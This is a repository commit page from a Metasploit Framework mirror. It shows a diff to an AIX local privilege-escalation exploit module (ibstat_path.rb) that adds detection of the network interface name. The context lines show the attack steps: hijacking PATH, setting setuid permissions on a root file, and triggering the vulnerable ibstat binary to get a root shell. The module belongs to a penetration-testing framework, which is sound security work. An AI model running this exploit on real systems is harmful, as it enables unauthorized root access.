infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #3384, AIX ibstat exploit interface detection

bug/bundler_fix
William Vu 2014-05-22 16:24:02 -05:00
parent ebd70cbd8f 28459299b2
commit dc7ec450da
No known key found for this signature in database
GPG Key ID: E761DCB4C1629024
1 changed files with 15 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

16
modules/exploits/aix/local/ibstat_path.rb
View File

@ -110,8 +110,22 @@ chmod 4555 #{root_file}
cmd_exec("PATH=#{datastore["WritableDir"]}:$PATH") cmd_exec("PATH=#{datastore["WritableDir"]}:$PATH")
cmd_exec("export PATH") cmd_exec("export PATH")
print_status("Finding interface name...")
iface = ""
cmd_exec("lsdev -Cc if").each_line do |line|
if line.match(/^[a-z]+[0-9]+\s+Available/) and not line.match(/^lo[0-9]/)
iface = line.split(/\s+/)[0]
print_status("Found interface #{iface}.")
break
end
end
if iface == ""
iface = "en0"
print_status("Found no interface, defaulting to en0.")
end
print_status("Triggering vulnerablity...") print_status("Triggering vulnerablity...")
cmd_exec("/usr/bin/ibstat -a -i en0 2>/dev/null >/dev/null") cmd_exec("/usr/bin/ibstat -a -i #{iface} 2>/dev/null >/dev/null")
# The $PATH variable must be restored before the payload is executed # The $PATH variable must be restored before the payload is executed
# in cases where an euid root shell was gained # in cases where an euid root shell was gained